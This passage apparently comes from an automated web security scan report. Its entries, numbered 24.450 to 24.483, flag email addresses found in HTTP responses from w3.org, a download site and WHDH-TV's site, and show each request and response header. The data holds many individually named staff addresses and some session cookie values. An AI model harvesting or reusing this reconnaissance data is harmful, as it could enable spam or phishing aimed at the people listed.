GET /TR/css3-selectors/ HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:07 GMT
Server: Apache/2
Last-Modified: Mon, 14 Dec 2009 23:41:18 GMT
ETag: "1fda8-47ab8cf570380"
Accept-Ranges: bytes
Content-Length: 130472
Cache-Control: max-age=21600
Expires: Mon, 24 Jan 2011 21:15:07 GMT
Vary: Accept-Encoding
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html lang=en>
<head>
<title>Selectors Level 3</title>
<link href=default.css rel=stylesheet type="text
...[SNIP]...
<a class="url fn" href="mailto:ian@hixie.ch">
...[SNIP]...
<a
href="mailto:www-style@w3.org?Subject=%5Bcss3-selectors%5D%20PUT%20SUBJECT%20HERE">www-style@w3.org</a>
...[SNIP]...

24.450. http://www.w3.org/TR/html4/strict.dtd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.w3.org
Path:	/TR/html4/strict.dtd

Issue detail

The following email addresses were disclosed in the response:

dsr@w3.org
ij@w3.org
lehors@w3.org

Request

GET /TR/html4/strict.dtd HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:19 GMT
Server: Apache/2
Content-Location: strict.dtd.raw
Vary: negotiate,accept-encoding,User-Agent
TCN: choice
Last-Modified: Fri, 24 Dec 1999 23:37:48 GMT
ETag: "8720-35c741aef8b00;475d1b7cb20c0"
Accept-Ranges: bytes
Content-Length: 34592
Cache-Control: max-age=7776000
Expires: Mon, 25 Apr 2011 00:11:19 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/plain

<!--
This is HTML 4.01 Strict DTD, which excludes the presentation
attributes and elements that W3C expects to phase out as
support for style sheets matures. Authors should use the Stric
...[SNIP]...
<dsr@w3.org>
...[SNIP]...
<lehors@w3.org>
...[SNIP]...
<ij@w3.org>
...[SNIP]...

24.451. http://www.x64bitdownload.com/js/rating.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/js/rating.js

Issue detail

The following email address was disclosed in the response:

ryan@masugadesign.com

Request

GET /js/rating.js HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:54:40 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Fri, 29 Oct 2010 10:56:13 GMT
ETag: "14e3ae8-2c36-493bf4e90ed40"
Accept-Ranges: bytes
Content-Length: 11318
Connection: close
Content-Type: application/x-javascript

/*
Behaviour v1.1 by Ben Nolan, June 2005. Based largely on the work
of Simon Willison (see comments by Simon below).

Description:

Uses css selectors to apply javascript behaviours to e
...[SNIP]...
rating.js
Created: Aug 2006
Last Mod: Mar 11 2007
Handles actions and requests for rating bars.
---------------------------------------------------------
ryan masuga, masugadesign.com
ryan@masugadesign.com
Licensed under a Creative Commons Attribution 3.0 License.
http://creativecommons.org/licenses/by/3.0/
See readme.txt for full credit details.
---------------------------------------------------------
...[SNIP]...

24.452. http://www.x64bitdownload.com/templates/X64/css/rating.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/templates/X64/css/rating.css

Issue detail

The following email address was disclosed in the response:

ryan@masugadesign.com

Request

GET /templates/X64/css/rating.css HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:54:40 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Fri, 26 Jun 2009 10:56:03 GMT
ETag: "14e3ae9-881-46d3e2fba96c0"
Accept-Ranges: bytes
Content-Length: 2177
Connection: close
Content-Type: text/css

/* styles for the unit rater
---------------------------------------------------------
ryan masuga, masugadesign.com
ryan@masugadesign.com
Licensed under a Creative Commons Attribution 3.0 License.
http://creativecommons.org/licenses/by/3.0/
See readme.txt for full credit details.
---------------------------------------------------------
...[SNIP]...

24.453. http://www1.whdh.com/contact/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/contact/

Issue detail

The following email addresses were disclosed in the response:

cyber@whdh.com
helpmehank@whdh.com
newstips@whdh.com
program_feedback@whdh.com
station_management@whdh.com
viewer_news@whdh.com
webmaster@whdh.com

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:02 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 118
Cache-Control: max-age=16035
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 02:22:30 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107005 (MII-APC/1.6)
Content-Length: 10214
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS NBC - Contact Us</title>
<meta name="publisher" content="New England N
...[SNIP]...
<a href="mailto:webmaster@whdh.com">webmaster@whdh.com</a>
...[SNIP]...
<a href="mailto:cyber@whdh.com">cyber@whdh.com</a>
...[SNIP]...
<a href="mailto:helpmehank@whdh.com">helpmehank@whdh.com</a>
...[SNIP]...
<a href="mailto:newstips@whdh.com">newstips@whdh.com</a>
...[SNIP]...
<a href="mailto:viewer_news@whdh.com">viewer_news@whdh.com</a>
...[SNIP]...
<a href="mailto:program_feedback@whdh.com">program_feedback@whdh.com</a>
...[SNIP]...
<a href="mailto:station_management@whdh.com">station_management@whdh.com</a>
...[SNIP]...

24.454. http://www1.whdh.com/contact/closed-caption-concerns previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/contact/closed-caption-concerns

Issue detail

The following email addresses were disclosed in the response:

ClosedCaptionConcerns@whdh.com
jshultis@whdh.com

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:13 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: closed-caption-concerns.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Cache-Control: max-age=172800
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Wed, 26 Jan 2011 21:56:23 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107005 (MII-APC/1.6)
Connection: close
Content-Length: 9050

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS NBC - Closed Caption Concerns</title>
<meta name="publisher" content="
...[SNIP]...
<a href=\"mailto:ClosedCaptionConcerns@whdh.com\">ClosedCaptionConcerns@whdh.com</a>
...[SNIP]...
<br/>" +
"EMAIL: jshultis@whdh.com" +
"</p>
...[SNIP]...

24.455. http://www1.whdh.com/events/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/events/

Issue detail

The following email address was disclosed in the response:

kmeidanis@whdh.com

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:07 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=43028
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 09:54:24 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 13847
Via: 1.1 dfw107003 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS NBC - Community Calendar</title>
<meta name="publisher" content="New E
...[SNIP]...
<a href="mailto:kmeidanis@whdh.com">kmeidanis@whdh.com</a>
...[SNIP]...

24.456. http://www1.whdh.com/features/articles/dish/BO144734/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/dish/BO144734/

Issue detail

The following email address was disclosed in the response:

JParrish@whdh.com

Request

Response

24.457. http://www1.whdh.com/features/articles/dish/BO144759/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/dish/BO144759/

Issue detail

The following email address was disclosed in the response:

JParrish@whdh.com

Request

Response

24.458. http://www1.whdh.com/features/articles/dish/BO144797/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/dish/BO144797/

Issue detail

The following email address was disclosed in the response:

JParrish@whdh.com

Request

Response

24.459. http://www1.whdh.com/features/articles/dish/BO144833/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/dish/BO144833/

Issue detail

The following email address was disclosed in the response:

FRivera@whdh.com

Request

Response

24.460. http://www1.whdh.com/features/articles/hank/BO144372/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/hank/BO144372/

Issue detail

The following email address was disclosed in the response:

mschwager@whdh.com

Request

Response

24.461. http://www1.whdh.com/features/articles/hank/BO144452/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/hank/BO144452/

Issue detail

The following email address was disclosed in the response:

mschwager@whdh.com

Request

Response

24.462. http://www1.whdh.com/features/articles/hank/BO144489/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/hank/BO144489/

Issue detail

The following email address was disclosed in the response:

mschwager@whdh.com

Request

Response

24.463. http://www1.whdh.com/features/articles/hank/BO144588/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/hank/BO144588/

Issue detail

The following email address was disclosed in the response:

MSchwager@whdh.com

Request

Response

24.464. http://www1.whdh.com/features/articles/hiller/BO144771/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/hiller/BO144771/

Issue detail

The following email address was disclosed in the response:

mboudo@whdh.com

Request

Response

24.465. http://www1.whdh.com/features/articles/hiller/BO144776/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/hiller/BO144776/

Issue detail

The following email address was disclosed in the response:

Mboudo@whdh.com

Request

Response

24.466. http://www1.whdh.com/features/articles/hiller/BO144796/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/hiller/BO144796/

Issue detail

The following email address was disclosed in the response:

MBoudo@whdh.com

Request

Response

24.467. http://www1.whdh.com/features/articles/hiller/BO144813/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/hiller/BO144813/

Issue detail

The following email address was disclosed in the response:

MBoudo@whdh.com

Request

Response

24.468. http://www1.whdh.com/features/articles/hiller/BO144841/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/hiller/BO144841/

Issue detail

The following email address was disclosed in the response:

JSavio@whdh.com

Request

Response

24.469. http://www1.whdh.com/features/articles/holiday_helping/BO144709/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/holiday_helping/BO144709/

Issue detail

The following email address was disclosed in the response:

KHenry@whdh.com

Request

Response

24.470. http://www1.whdh.com/features/articles/holiday_helping/BO144719/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/holiday_helping/BO144719/

Issue detail

The following email address was disclosed in the response:

KHenry@whdh.com

Request

Response

24.471. http://www1.whdh.com/features/articles/holiday_helping/BO144727/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/holiday_helping/BO144727/

Issue detail

The following email address was disclosed in the response:

KHenry@whdh.com

Request

Response

24.472. http://www1.whdh.com/features/articles/holiday_helping/BO144733/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/articles/holiday_helping/BO144733/

Issue detail

The following email address was disclosed in the response:

KHenry@whdh.com

Request

Response

24.473. http://www1.whdh.com/includes/elements/accordion_whdh-senditto7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/includes/elements/accordion_whdh-senditto7

Issue detail

The following email address was disclosed in the response:

senditto7@whdh.com

Request

GET /includes/elements/accordion_whdh-senditto7 HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:21 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: accordion_whdh-senditto7.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Cache-Control: max-age=28800
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 05:56:31 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close
Content-Length: 4266

<div style='padding:8px;border-bottom:1px solid #cfcfcf;background:#f0f0f0;'>
<h4 style='margin-bottom:7px;'>Your Photos Sent to 7</h4><a href="http://www1.whdh.com/slideshows/view/View
...[SNIP]...
<a href="mailto:senditto7@whdh.com">senditto7@whdh.com</a>
...[SNIP]...

24.474. http://www1.whdh.com/includes/elements/accordion_whdh-storyideas previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/includes/elements/accordion_whdh-storyideas

Issue detail

The following email address was disclosed in the response:

newstips@whdh.com

Request

GET /includes/elements/accordion_whdh-storyideas HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:24 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: accordion_whdh-storyideas.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Cache-Control: max-age=600
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:06:35 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close
Content-Length: 2095

<div class='ui-helper-clearfix' style='padding:10px;background:#f0f0f0;border-bottom:1px solid #cfcfcf;'>
<h4 style='margin-bottom:7px;'>Have a story idea or news tip for 7NEWS?</h4><p>Email: <a href="mailto:newstips@whdh.com">newstips@whdh.com</a>
...[SNIP]...

24.475. http://www1.whdh.com/includes/elements/accordion_whdh-viewervoices previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/includes/elements/accordion_whdh-viewervoices

Issue detail

The following email address was disclosed in the response:

viewervoices@whdh.com

Request

GET /includes/elements/accordion_whdh-viewervoices HTTP/1.1
Host: www1.whdh.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; __utmc=208585492; __utmb=208585492.1.10.1295906131; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; ACC1TAB=1

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:53:58 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: accordion_whdh-viewervoices.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Cache-Control: max-age=3600
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:53:08 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107006 (MII-APC/1.6)
Content-Length: 2006

<div class='accordion-vv'><div class='accordion-vv-top'><h4>We want to hear from you</h4><img src='http://www1.whdh.com/images/news_articles/116x65/110121_braintree_snow.jpg' /><p><a href="http://www1
...[SNIP]...
<a href="mailto:viewervoices@whdh.com">
...[SNIP]...

24.476. http://www1.whdh.com/jobs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/jobs/

Issue detail

The following email address was disclosed in the response:

human_resources@whdh.com

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:05 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=2718
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:42:36 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14859
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS NBC - Job Postings</title>
<meta name="publisher" content="New England
...[SNIP]...
<a href="mailto:human_resources@whdh.com">human_resources@whdh.com</a>
...[SNIP]...

24.477. http://www1.whdh.com/jobs/internships previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/jobs/internships

Issue detail

The following email addresses were disclosed in the response:

SMacEachern@whdh.com
human_resources@whdh.com
khenry@whdh.com
klam@whdh.com

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:15 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: internships.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Cache-Control: max-age=86400
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 21:56:25 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close
Content-Length: 14434

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS NBC - Internship Opportunities</title>
<meta name="publisher" content=
...[SNIP]...
ecialized segments of news such as political, medical or consumer stories. Provide clerical assistance and research support. Occasional field production assistance. Email cover letter and resume to khenry@whdh.com outlining your interests and availability. SPRING SEMESTER 2011 IS FULL! NO MORE APPLICATIONS ARE BEING ACCEPTED AT THIS TIME. APPLY MID- APRIL FOR A SUMMER INTERNSHIP. THANK YOU.<br />
...[SNIP]...
upport as needed. Intern in the heart of the news operation days, evenings and/or weekends. Email your resume and a cover letter giving approximate availability (days and hours) to Scott MacEachern, SMacEachern@whdh.com along with why you are a good candidate for our program. <br />
...[SNIP]...
nclude checking major sports websites for breaking news, logging game tapes, answering phones, etc. Opportunities to accompany crews in the field may exist. Send cover letter and resume to Sports at klam@whdh.com with why you would be an asset to the sports team in the coming semester. Sports interns log games, research stories, assist with details for upcoming sportscasts and assist with basic clerical suppo
...[SNIP]...
<a href="mailto:human_resources@whdh.com">human_resources@whdh.com</a>
...[SNIP]...

24.478. http://www1.whdh.com/js/jq/jquery.hoverIntent-r5.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/js/jq/jquery.hoverIntent-r5.min.js

Issue detail

The following email address was disclosed in the response:

brian@cherne.net

Request

GET /js/jq/jquery.hoverIntent-r5.min.js HTTP/1.1
Host: www1.whdh.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 04:52:52 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Type: application/x-javascript
Last-Modified: Mon, 17 Aug 2009 12:57:34 GMT
ETag: "1ec21d-647-f20deb80"
Accept-Ranges: bytes
Age: 61306
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 04:52:52 GMT
Cache-Control: max-age=604800
Via: 1.1 dfw107010 (MII-APC/1.6)
Content-Length: 1607

/**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @param
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

24.479. http://www1.whdh.com/news/articles/local/12003358982377/quincy-school-evacuated-due-to-odor/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/local/12003358982377/quincy-school-evacuated-due-to-odor/

Issue detail

The following email address was disclosed in the response:

newstips@whdh.com

Request

Response

24.480. http://www1.whdh.com/privacypolicy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/privacypolicy

Issue detail

The following email address was disclosed in the response:

webmaster@whdh.com

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:08 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Location: privacypolicy.php
Vary: negotiate
TCN: choice
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Cache-Control: max-age=172800
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Wed, 26 Jan 2011 21:56:18 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107022 (MII-APC/1.6)
Connection: close
Content-Length: 19843

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS NBC - Privacy Policy</title>
<meta name="publisher" content="New Engla
...[SNIP]...
<a href="mailto:webmaster@whdh.com">webmaster@whdh.com</a>
...[SNIP]...
essage. Simply click on this link to go to a page that allows you to unsubscribe from any or all of the lists you are subscribed to. In addition to using the unsubscribe page, you can send an email to webmaster@whdh.com or write to us at WHDH-TV, 7 Bulfinch Place, Boston, MA 02215, ATT: WHDH.com webmaster.
</p>
...[SNIP]...
<br />
webmaster@whdh.com
</p>
...[SNIP]...

24.481. http://www1.whdh.com/sales/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/sales/

Issue detail

The following email addresses were disclosed in the response:

cshiebler@whdh.com
ddelvecchioy@whdh.com
eclark@whdh.com
jhowe@whdh.com
lhoey@whdh.com
lmattson@whdh.com
lryan@whdh.com
mburt@whdh.com
pbertoli@whdh.com
pcommane@whdh.com
pmagnes@whdh.com
pmarkham@whdh.com
rburns@whdh.com
rkramer@whdh.com

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:03 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=3430
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:54:23 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 9850
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS NBC - Sales</title>
<meta name="publisher" content="New England News S
...[SNIP]...
<a href="mailto:rburns@whdh.com">
...[SNIP]...
<a href="mailto:pmagnes@whdh.com">
...[SNIP]...
<a href="mailto:mburt@whdh.com">
...[SNIP]...
<a href="mailto:rkramer@whdh.com">
...[SNIP]...
<a href="mailto:lmattson@whdh.com">
...[SNIP]...
<a href="mailto:pmarkham@whdh.com">
...[SNIP]...
<a href="mailto:pbertoli@whdh.com">
...[SNIP]...
<a href="mailto:eclark@whdh.com">
...[SNIP]...
<a href="mailto:pcommane@whdh.com">
...[SNIP]...
<a href="mailto:ddelvecchioy@whdh.com">
...[SNIP]...
<a href="mailto:lhoey@whdh.com">
...[SNIP]...
<a href="mailto:jhowe@whdh.com">
...[SNIP]...
<a href="mailto:lryan@whdh.com">
...[SNIP]...
<a href="mailto:cshiebler@whdh.com">
...[SNIP]...

24.482. http://www1.whdh.com/slideshows/view/BitterBlastTemperatures previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/slideshows/view/BitterBlastTemperatures

Issue detail

The following email address was disclosed in the response:

senditto7@whdh.com

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:19 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Age: 0
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:57:19 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21954
Via: 1.1 dfw107005 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH Gallery: Bitter Blast Temperatures</title>
<meta name="publisher" content="New
...[SNIP]...
<p>Send your Bitter Blast Temperatures pics to senditto7@whdh.com to be featured on our website.</p>
...[SNIP]...

24.483. http://www1.whdh.com/slideshows/view/FunintheSnow previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/slideshows/view/FunintheSnow

Issue detail

The following email address was disclosed in the response:

senditto7@whdh.com

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:22 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Age: 0
Warning: 113 www1.whdh.com "Heuristic expiration" "Mon, 24 Jan 2011 21:57:22 GMT"
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:57:22 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 23022
